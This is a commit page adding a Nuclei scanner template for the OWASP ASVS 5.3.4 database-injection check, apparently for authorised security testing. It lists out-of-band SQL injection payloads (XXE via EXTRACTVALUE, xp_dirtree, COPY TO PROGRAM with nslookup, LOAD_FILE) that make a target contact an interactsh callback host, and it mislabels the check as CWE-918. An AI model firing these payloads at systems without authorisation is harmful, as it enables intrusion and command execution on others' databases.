Skip to content

Commit a0d65b2

Browse files
authored
Create 5.3.4.yaml
Signed-off-by: AmirHossein Raeisi <[email protected]>
1 parent 1360f6e commit a0d65b2

File tree

1 file changed

+50
-0
lines changed

1 file changed

+50
-0
lines changed

templates/dast/5.3.4.yaml

Lines changed: 50 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,50 @@
1+
id: ASVS-4-0-3-V5-3-4
2+
3+
info:
4+
name: ASVS 5.3.4 Check
5+
author: AmirHossein Raeisi,snoopy
6+
severity: critical
7+
classification:
8+
cwe-id: CWE-918
9+
reference:
10+
- https://portswigger.net/web-security/sql-injection/cheat-sheet
11+
tags: asvs,5.3.4
12+
description: |
13+
Verify that data selection or database queries (e.g. SQL, HQL, ORM, NoSQL) use parameterized queries, ORMs, entity frameworks, or are otherwise protected from database injection attacks.
14+
15+
http:
16+
- pre-condition:
17+
- type: dsl
18+
dsl:
19+
- 'method != "OPTIONS"'
20+
21+
payloads:
22+
sqli:
23+
- "SELECT EXTRACTVALUE(xmltype('<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM \"{{interactsh-url}}\"> %remote;]>'),'/l') FROM dual--"
24+
- "SELECT UTL_INADDR.get_host_address('{{interactsh-url}}')--"
25+
- "'; exec master..xp_dirtree '//{{interactsh-url}}/a'--"
26+
- "copy (SELECT '') to program 'nslookup {{interactsh-url}}'--"
27+
- "LOAD_FILE('\\\\{{interactsh-url}}\\a')-- -"
28+
- "SELECT ... INTO OUTFILE '\\\\{{interactsh-url}}\a'-- -"
29+
fuzzing:
30+
- parts:
31+
- query
32+
- body
33+
- header
34+
type: postfix
35+
mode: single
36+
fuzz:
37+
- "' UNION {{sqli}}"
38+
- "\" UNION {{sqli}}"
39+
- "' AND 1={{sqli}}"
40+
- "\" AND 1={{sqli}}"
41+
- " {{sqli}}"
42+
43+
44+
stop-at-first-match: true
45+
matchers:
46+
- type: word
47+
part: interactsh_protocol
48+
words:
49+
- "http"
50+
- "dns"

0 commit comments

Comments
 (0)